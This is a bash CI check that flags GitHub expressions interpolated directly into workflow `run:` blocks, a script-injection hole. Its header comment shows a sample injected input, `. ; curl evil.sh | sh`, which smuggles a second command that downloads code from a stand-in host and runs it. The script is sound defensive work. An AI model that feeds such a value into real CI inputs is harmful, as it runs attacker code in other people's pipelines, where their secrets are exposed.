#!/usr/bin/env bash
# Fail if any `run:` block interpolates a GitHub expression directly.
#
# Why this exists: GitHub expands ${{ ... }} *textually* into the script source
# before bash ever parses it. So `run: semgrep $\{{ inputs.paths }}` does not pass
# a string to bash -- it pastes the input into the program. An input of
# `. ; curl evil.sh | sh` becomes two commands. Routing the same value through
# `env:` and referencing `$VAR` passes it as data; bash word-splits it but never
# re-parses it as code.
#
# This repo publishes a composite action that runs inside other people's CI with
# their GITHUB_TOKEN in scope, so this bug class is a vulnerability in their
# runners. It shipped once (fixed in 3c90f54). This check is why it won't again.
#
# Exit 0 = clean. Exit 1 = at least one finding. Exit 2 = the check itself
# could not run, which must never be mistaken for clean.

set -euo pipefail

cd "$(dirname "$0")/.."

# Expressions that are safe to interpolate: they are generated by GitHub, not by
# anything a user or an attacker can set. Keep this list short and justify additions.
#   github.action_path  - filesystem path GitHub assigns to the action checkout
#   runner.*            - runner-provided paths and OS
#   matrix.*            - values from the workflow's own matrix literal
SAFE_RE='^(github\.action_path|runner\.[a-z_]+|matrix\.[A-Za-z0-9_-]+)$'

findings=0

scan_file() {
  local file="$1"
  local in_run=0 run_indent=0 lineno=0 line

  while IFS= read -r line; do
    lineno=$((lineno + 1))

    # Track whether we are inside a `run:` block scalar. A block ends at the
    # first non-blank line indented at or below the `run:` key itself.
    if [ "$in_run" -eq 1 ]; then
      if [ -n "${line//[[:space:]]/}" ]; then
        local indent="${line%%[![:space:]]*}"
        if [ "${#indent}" -le "$run_indent" ]; then
          in_run=0
        fi
      fi
    fi

    if [ "$in_run" -eq 0 ]; then
      # `run: |`, `run: >`, or a one-line `run: cmd`
      if [[ "$line" =~ ^([[:space:]]*)run:[[:space:]] ]]; then
        local key_indent="${BASH_REMATCH[1]}"
        # A one-liner is still a run block for our purposes -- check it, then
        # only enter multi-line mode if the value was a block indicator.
        if [[ "$line" =~ run:[[:space:]]*[\|\>] ]]; then
          in_run=1
          run_indent="${#key_indent}"
          continue
        fi
      else
        continue
      fi
    fi

    # Extract every ${{ ... }} on this line and judge it.
    local rest="$line" expr
    while [[ "$rest" =~ \$\{\{([^}]*)\}\} ]]; do
      expr="${BASH_REMATCH[1]}"
      rest="${rest#*\}\}}"
      # trim surrounding whitespace
      expr="${expr#"${expr%%[![:space:]]*}"}"
      expr="${expr%"${expr##*[![:space:]]}"}"
      if [[ ! "$expr" =~ $SAFE_RE ]]; then
        printf '%s:%d: \${{ %s }} interpolated into a run: block\n' "$file" "$lineno" "$expr" >&2
        printf '    pass it through env: and reference it as a shell variable instead\n' >&2
        findings=$((findings + 1))
      fi
    done
  done < "$file"
}

shopt -s nullglob
candidates=(action.yml action.yaml .github/workflows/*.yml .github/workflows/*.yaml)
shopt -u nullglob

# nullglob drops empty globs but not the two literal filenames, so filter by
# existence -- otherwise a missing action.yaml makes the read below fail and,
# under set -e, this check dies with a status the CI step would read as failure
# for the wrong reason.
files=()
for f in "${candidates[@]}"; do
  [ -f "$f" ] && files+=("$f")
done

if [ "${#files[@]}" -eq 0 ]; then
  echo "check-workflow-injection: no action or workflow files found -- refusing to report clean" >&2
  exit 2
fi

for f in "${files[@]}"; do
  scan_file "$f"
done

if [ "$findings" -gt 0 ]; then
  printf '\ncheck-workflow-injection: %d finding(s) across %d file(s)\n' "$findings" "${#files[@]}" >&2
  exit 1
fi

printf 'check-workflow-injection: clean (%d files scanned)\n' "${#files[@]}"
